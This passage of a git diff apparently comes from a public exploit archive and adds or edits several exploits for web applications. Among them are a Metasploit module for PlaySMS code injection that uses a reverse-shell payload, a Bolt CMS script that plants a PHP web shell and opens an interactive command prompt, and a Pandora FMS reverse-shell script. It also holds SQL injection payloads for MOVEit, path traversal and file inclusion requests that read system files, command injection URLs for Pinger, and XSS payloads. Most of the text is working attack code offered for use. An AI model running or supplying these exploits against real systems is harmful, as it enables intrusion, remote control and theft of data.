+ second time, results in code execution.
+ The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.
+
+ This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.
+ },
+ 'Author' =>
+ [
+ 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
+ 'Lucas Rosevear' # Found and Initial PoC by NCC Group
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2020-8644'],
+ ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
+ ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => false,
+ 'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+ 'ENCODER' => 'php/base64'
+ },
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'PlaySMS Before 1.4.3', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2020-02-05'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']),
+ ]
+ )
+ end
+
+ def uri
+ return target_uri.path
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, 'index.php')
+ })
+ rescue StandardError
+ vprint_error('Unable to access the index.php file')
+ return CheckCode::Unknown
+ end
+
+ if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
+ return Exploit::CheckCode::Appears
+ end
+
+ return CheckCode::Safe
+ end
+
+ # Send Payload in Login Request
+ def login
+ res = send_request_cgi({
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'method' => 'GET',
+ 'vars_get' => {
+ 'app' => 'main',
+ 'inc' => 'core_auth',
+ 'route' => 'login'
+ }
+ })
+
+ # Grabbing CSRF token from body
+ /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine the CSRF token") if csrf.nil?
+ vprint_good("X-CSRF-Token for login : #{csrf}")
+
+ cookies = res.get_cookies
+
+ vprint_status('Trying to send the payload in the username field...')
+
+ # Encoded in base64 to avoid HTML TAGS which are filter by the Application which is also blocking semicolon(;), that is why we're using delete_suffix(';')
+ evil = "{{#{payload.encoded.delete_suffix(';')}}}"
+
+ # Send Payload with cookies.
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'cookie' => cookies,
+ 'vars_get' => Hash[{
+ 'app' => 'main',
+ 'inc' => 'core_auth',
+ 'route' => 'login',
+ 'op' => 'login'
+ }.to_a.shuffle],
+ 'vars_post' => Hash[{
+ 'X-CSRF-Token' => csrf,
+ 'username' => evil,
+ 'password' => ''
+ }.to_a.shuffle]
+ })
+
+ fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+
+ # Request Status Check
+ if res.code == 302
+ print_good('Payload successfully sent')
+ return cookies
+ else
+ fail_with(Failure::UnexpectedReply, "#{peer} - Something went wrong")
+ end
+ end
+
+ def exploit
+ cookies = login
+ vprint_status("Cookies here : #{cookies}")
+ # Execute Last Sent Username.
+ send_request_cgi({
+ 'uri' => normalize_uri(uri, 'index.php'),
+ 'method' => 'GET',
+ 'cookie' => cookies,
+ 'vars_get' => {
+ 'app' => 'main',
+ 'inc' => 'core_auth',
+ 'route' => 'login'
+ }
+ }, 0)
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py
index 4cd329aa0..46246b5c1 100755
--- a/exploits/php/webapps/47898.py
+++ b/exploits/php/webapps/47898.py
@@ -12,32 +12,32 @@
import requests
import sys
-if len(sys.argv) !=3D 6:
+if len(sys.argv) != 6:
print("[+] Usage : ./exploit.py target username password ip port")
exit()
-target =3D sys.argv[1]
-username =3D sys.argv[2]
-password =3D sys.argv[3]
-ip =3D sys.argv[4]
-port =3D int(sys.argv[5])
+target = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = int(sys.argv[5])
-request =3D requests.session()
+request = requests.session()
-login_info =3D {
+login_info = {
"nick": username,
"pass": password,
"login_button": "Login"
}
-login_request =3D request.post(
- target+"/pandora_console/index.php?login=3D1",
+login_request = request.post(
+ target+"/pandora_console/index.php?login=1",
login_info,
- verify=3DFalse,
- allow_redirects=3DTrue
+ verify=False,
+ allow_redirects=True
)
-resp =3D login_request.text
+resp = login_request.text
if "User not found in database" in resp:
print("[-] Login Failed")
@@ -47,7 +47,7 @@ else:
print("[+] Sending crafted graph request ..")
-body_request =3D {
+body_request = {
"date": "0",
"time": "0",
"period": "0",
@@ -65,7 +65,6 @@ body_request =3D {
"draw_button": "Draw"
}
-draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
-on/netflow/nf_live_view&pure=3D0"
+draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0"
print("[+] Check your netcat ;)")
request.post(draw_url, body_request)
\ No newline at end of file
diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt
new file mode 100644
index 000000000..213de9367
--- /dev/null
+++ b/exploits/php/webapps/48289.txt
@@ -0,0 +1,30 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# CVE : CVE-2020-11456
+
+# Vulnerability Details
+Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel.
+Vulnerable Parameter : "title"
+
+
+# POC
+POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1
+Host: TARGET
+Content-Length: 374
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D
+Connection: close
+
+YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=
\ No newline at end of file
diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py
new file mode 100755
index 000000000..9b3401a53
--- /dev/null
+++ b/exploits/php/webapps/48296.py
@@ -0,0 +1,167 @@
+# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
+# Date: 2020-04-05
+# Exploit Author: r3m0t3nu11
+# Vendor Homepage: https://bolt.cm/
+# Software Link: https://bolt.cm/
+# Version: up to date and 6.x
+# Tested on: Linux
+# CVE : not-yet-0day
+
+# last version
+
+# p0c
+
+
+#!/usr/bin/python
+
+import requests
+import sys
+import warnings
+import re
+import os
+from bs4 import BeautifulSoup
+from colorama import init
+from termcolor import colored
+
+init()
+
+print(colored('''
+ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄
+ ▄▄▄▄▄▄▄▄▄▄▄
+▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌
+▐░░▌▐░░░░░░░░░░░▌
+▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌
+▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀
+▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌
+▐░▌▐░▌▐░▌
+▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌
+▐░▌▐░█▄▄▄▄▄▄▄▄▄
+▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌
+ ▐░▌▐░░░░░░░░░░░▌
+▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌
+▀▀▀▀▀▀▀▀▀█░▌
+▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌
+ ▐░
+▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌
+▄▄▄▄▄▄▄▄▄█░▌
+▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌
+▐░▌▐░░░░░░░░░░░▌
+ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀
+ ▀▀▀▀▀▀▀▀▀▀▀
+
+Pre Auth rce with low credintanl
+By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
+
+
+
+if len(sys.argv) != 4:
+ print((len(sys.argv)))
+ print((colored("[~] Usage : ./bolt.py url username password","red")))
+ exit()
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+
+
+
+request = requests.session()
+print((colored("[+] Retrieving CSRF token to submit the login
+form","green")))
+page = request.get(url+"/bolt/login")
+html_content = page.text
+soup = BeautifulSoup(html_content, 'html.parser')
+token = soup.findAll('input')[2].get("value")
+
+login_info = {
+ "user_login[username]": username,
+ "user_login[password]": password,
+ "user_login[login]": "",
+ "user_login[_token]": token
+ }
+
+login_request = request.post(url+"/bolt/login", login_info)
+print((colored("[+] Login token is : {0}","green")).format(token))
+
+
+
+aaa = request.get(url+"/bolt/profile")
+soup0 = BeautifulSoup(aaa.content, 'html.parser')
+token0 = soup0.findAll('input')[6].get("value")
+data_profile = {
+"user_profile[password][first]":"password",
+"user_profile[password][second]":"password",
+"user_profile[email]":"a@a.com",
+"user_profile[displayname]":"<?php system($_GET['test']);?>",
+"user_profile[save]":"",
+"user_profile[_token]":token0
+
+}
+profile = request.post(url+'/bolt/profile',data_profile)
+
+
+
+
+cache_csrf = request.get(url+"/bolt/overview/showcases")
+
+soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
+csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")
+
+
+asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
+soup2 = BeautifulSoup(asyncc.text, 'html.parser')
+tables = soup2.find_all('span', class_ = 'entry disabled')
+
+
+print((colored("[+] SESSION INJECTION ","green")))
+for all_tables in tables:
+
+f= open("session.txt","a+")
+f.write(all_tables.text+"\n")
+f.close()
+num_lines = sum(1 for line in open('session.txt'))
+
+renamePostData = {
+"namespace": "root",
+"parent": "/app/cache/.sessions",
+"oldname": all_tables.text,
+"newname": "../../../public/files/test{}.php".format(num_lines),
+"token": csrf
+ }
+rename = request.post(url+"/async/folder/rename", renamePostData)
+
+
+
+
+try:
+url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
+
+rev = requests.get(url1).text
+r1 = re.findall('php',rev)
+
+r2 = r1[0]
+if r2 == "php" :
+fileINJ = "test{}".format(num_lines)
+
+print((colored("[+] FOUND : "+fileINJ,"green")))
+
+except IndexError:
+print((colored("[-] Not found.","red")))
+
+new_name = 0
+while new_name != 'quit':
+inputs = input(colored("Enter OS command , for exit 'quit' :
+","green","on_red"))
+if inputs == "quit" :
+exit()
+else:
+a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
+aa = a.text
+r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
+
+
+print((r11)[0])
+
+
+
+
+Greetz to : all my friends
\ No newline at end of file
diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt
new file mode 100644
index 000000000..bda2a8a0f
--- /dev/null
+++ b/exploits/php/webapps/48297.txt
@@ -0,0 +1,18 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# CVE : CVE-2020-11455
+
+# Vulnerability Details
+# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
+# that allows an attacker to download arbitrary files. The file manager functionality will also
+# delete the file after it is downloaded (if the web service account has permissions to do so),
+# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
+Vulnerable Parameter : "path"
+
+
+# POC
+https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt
new file mode 100644
index 000000000..d15f6555f
--- /dev/null
+++ b/exploits/php/webapps/48303.txt
@@ -0,0 +1,111 @@
+# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
+# Date: 2020-04-08
+# Exploit Author: Spad Security Group
+# Vendor Homepage: https://www.djangoproject.com/
+# Software Link: https://pypi.org/project/Django/
+# Version: 3.0 =<
+# Tested on: windows 10
+# Language: python3.8
+
+# t.me/SpadSec
+# Spad Security Group
+
+
+from requests import Session
+import sys
+from bs4 import BeautifulSoup
+from time import sleep
+from colorama import Fore, Style
+from random import choice
+from os import name, system
+
+colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]
+
+
+def cleaner():
+ if name == "nt":
+ system("cls")
+ else:
+ system("clear")
+
+def logo_printer():
+ cleaner()
+ logo = r"""
+ \_______/
+ `.,-'\_____/`-.,'
+ /`..'\ _ /`.,'\
+ / /`.,' `.,'\ \
+/__/__/ \__\__\__
+\ \ \ / / /
+ \ \,'`._,'`./ /
+ \,'`./___\,'`./
+ ,'`-./_____\,-'`.
+ / \
+ """
+ _logo_enumer = 0
+ for char in logo:
+ sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
+ sys.stdout.flush()
+ _logo_enumer +=1
+ sleep(0.005)
+ print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")
+
+class DjangoCsrfMiddleWareBypass:
+ def __init__(self, url: str, username: str, password: str):
+ self.url = url
+ self.username = username
+ self.password = password
+ logo_printer()
+ self.cookies = {}
+ self.session = Session()
+ self.bypass()
+
+ def spad_printer(self, string):
+ print("\n")
+ for char in string:
+ sys.stdout.write(char)
+ sys.stdout.flush()
+ sleep(0.05)
+
+ def bypass(self):
+ global colors
+ _conn = self.session.get(self.url)
+ self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
+ self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
+ for key, value in _conn.cookies.items():
+ self.cookies[key] = value
+ self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")
+
+ soup = BeautifulSoup(_conn.text, "lxml")
+ csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
+ self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")
+
+ login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
+ if len(login.history) >= 2:
+ if login.history[1].is_redirect:
+ self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
+ else:
+ self.spad_printer("[-] Error")
+ else:
+ if login.history:
+ if login.history[0].is_redirect:
+ self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
+ for key, value in self.session.cookies.items():
+ self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
+ else:
+ self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
+ else:
+ self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
+
+if __name__ == "__main__":
+ try:
+ url = sys.argv[1]
+ username = sys.argv[2]
+ password = sys.argv[3]
+ DjangoCsrfMiddleWareBypass(url, username, password)
+ except IndexError:
+ logo_printer()
+ for char in f"[!] python {sys.argv[0]} http://google.com username password":
+ sys.stdout.write(char)
+ sys.stdout.flush()
+ sleep(0.05)
\ No newline at end of file
diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt
new file mode 100644
index 000000000..c4a02318e
--- /dev/null
+++ b/exploits/php/webapps/48312.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Webtateas 2.0 - Arbitrary File Read
+# Date: 2020-04-12
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
+# Software Link: http://webtareas.sourceforge.net/general/home.php
+# Version: Webtateas v2.0
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /webtareas/includes/general_serv.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 72
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/webtareas/general/home.php?
+Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
+DNT: 1
+
+action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini
\ No newline at end of file
diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt
new file mode 100644
index 000000000..cd87d86a0
--- /dev/null
+++ b/exploits/php/webapps/48315.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion
+# Google Dork: N/A
+# Date: 2020-04-13
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: http://davidlingren.com/
+# Software Link: https://wordpress.org/plugins/media-library-assistant/
+# Version: 2.81
+# Tested on: Windows 7 x86 SP1
+# CVE : CVE-2020-11731, CVE-2020-11732
+
+----Local File Inclusion----------------------------
+
+There is a file inclusion vulnerability in the mla-file-downloader.php file. Example:
+
+http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php
+
+Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication.
+
+
+----Multiple Cross-Site-Scripting-------------------
+
+There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript.
+
+Note that this vulnerability requires authentication.
+
+
+
+Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2
\ No newline at end of file
diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt
new file mode 100644
index 000000000..7d16a13e7
--- /dev/null
+++ b/exploits/php/webapps/48316.txt
@@ -0,0 +1,34 @@
+# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
+# Google Dork: inurl:human.aspx intext:moveit
+# Date: 2020-04-12
+# Exploit Authors: Aviv Beniash, Noam Moshe
+# Vendor Homepage: https://www.ipswitch.com/
+# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
+# CVE : CVE-2019-16383
+#
+# Related Resources:
+# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
+# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
+
+# Description:
+# The API call for revoking logon tokens is vulnerable to a
+# Time based blind SQL injection via the 'token' parameter
+
+# MSSQL payload:
+
+POST /api/v1/token/revoke HTTP/1.1
+Host: moveittransferstg
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+
+token='; WAITFOR DELAY '0:0:10'--
+
+
+# MySQL payload:
+
+POST /api/v1/token/revoke HTTP/1.1
+Host: moveittransferstg
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 21
+
+token=' OR SLEEP(10);
\ No newline at end of file
diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt
new file mode 100644
index 000000000..e6038c894
--- /dev/null
+++ b/exploits/php/webapps/48323.txt
@@ -0,0 +1,75 @@
+# Title: Pinger 1.0 - Remote Code Execution
+# Date: 2020-04-13
+# Author: Milad Karimi
+# Vendor Homepage: https://github.com/wcchandler/pinger
+# Software Link: https://github.com/wcchandler/pinger
+# Tested on: windows 10 , firefox
+# Version: 1.0
+# CVE : N/A
+
+================================================================================
+Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
+================================================================================
+# Vendor Homepage: https://github.com/wcchandler/pinger
+# Software Link: https://github.com/wcchandler/pinger
+# Date: 2020.04.13
+# Author: Milad Karimi
+# Tested on: windows 10 , firefox
+# Version: 1.0
+# CVE : N/A
+================================================================================
+# Description:
+simple, easy to use jQuery frontend to php backend that pings various
+devices and changes colors from green to red depending on if device is
+up or down.
+
+# PoC :
+
+http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
+http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php
+
+
+# Vulnerabile code:
+
+ if(isset($_GET['ping'])){
+ // if this is ever noticably slower, i'll pass it stuff when called
+ // change the good.xml to config.xml, good is what I use at $WORK
+ $xml = simplexml_load_file("config.xml");
+ //$xml = simplexml_load_file("good.xml");
+ if($_GET['ping'] == ""){
+ $host = "127.0.0.1";
+ }else{
+ $host = $_GET['ping'];
+ }
+ $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
+ .' '.$host.' | grep received | awk \'{print $4}\''));
+ $id = str_replace('.','_',$host);
+
+ if(($out == "1") || ($out == "0")){
+ echo json_encode(array("id"=>"h$id","res"=>"$out"));
+ }else{
+ ## if it returns nothing, assume network is messed up
+ echo json_encode(array("id"=>"h$id","res"=>"0"));
+ }
+ }
+
+ if(isset($_GET['socket'])){
+ $xml = simplexml_load_file("config.xml");
+ //$xml = simplexml_load_file("good.xml");
+ if($_GET['socket'] == ""){
+ $host = "127.0.0.1 80";
+ }else{
+ $host = str_replace(':',' ',$_GET['socket']);
+ }
+ $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
+ $id = str_replace('.','_',$host);
+ $id = str_replace(' ','_',$id);
+ if(preg_match("/succeeded/",$out)){
+ echo json_encode(array("id"=>"h$id","res"=>"1"));
+ }else{
+ ## if it returns nothing, assume network is messed up
+ echo json_encode(array("id"=>"h$id","res"=>"0"));
+ }
+ }
+
+ ?>
\ No newline at end of file
diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt
new file mode 100644
index 000000000..b44c3167f
--- /dev/null
+++ b/exploits/php/webapps/48324.txt
@@ -0,0 +1,352 @@
+# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.seeddms.org
+# Software Link: https://www.seeddms.org/index.php?id=7
+# CVE: N/A
+
+Document Title:
+===============
+SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2209
+
+
+Release Date:
+=============
+2020-04-15
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2209
+
+
+Common Vulnerability Scoring System:
+====================================
+4.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+SeedDMS is a free document management system with an easy to use web
+based user interface. It is based on PHP and
+MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
+development has made it a mature, powerful
+and enterprise ready platform for sharing and storing documents. It's
+fully compatible with its predecessor LetoDMS.
+
+(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
+https://www.seeddms.org/index.php?id=7 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
+
+
+Affected Product(s):
+====================
+Uwe Steinmann
+Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14,
+v5.1.16, v5.1.18 and v6.0.7
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-15: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent cross site web vulnerabilities has been discovered
+in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent cross site scripting web vulnerabilities are located in
+the `name` and `comment` parameter of the `AddEvent.php` file.
+Remote attackers are able to add an own event via op.AddEvent with
+malicious script codes. The request method to inject is POST
+and the attack vector is located on the application-side. After the
+inject the execution occurs in the admin panel within the
+`Log Management` - `Webdav` and `Web` on view. The content of the
+comment and name is unescaped pushed inside of the logs with
+a html/js template. Thus allows an attacker to remotly exploit the issue
+by a simple post inject from outside with lower privileges.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected or connected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] op.AddEvent (AddEvent.php)
+
+Vulnerable Parameter(s):
+[+] name
+[+] comment
+
+Affected Module(s):
+[+] Log Management (out.LogManagement.php)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attackers
+with low privileged web-application user account and low user interaction.
+For security demonstration or to reproduce the security web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Start your local webbrowser and tamper the http protocol session
+2. Open the AddEvent.php and add a new event
+3. Insert your script code test payload inside the Name or Comments path
+4. Save or submit the entry with error
+Note: Now the web and webdav log has captured the insert or erro
+5. Now wait until the administrator previews in the log management the
+web or webdav view function
+6. Successful reproduce of the persistent web vulnerability!
+
+
+PoC: Vulnerable Source (Log Management - View)
+<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe
+src="evil.source" onload="alert(document.cookie)"></iframe>
+&comment=<iframe src="evil.source"
+onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
+</pre>
+
+
+PoC: Payload
+>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>
+
+
+--- PoC Session Logs (POST) ---
+https://SeedDMS.localhost:8080/out/out.AddEvent.php
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.25 (Debian)
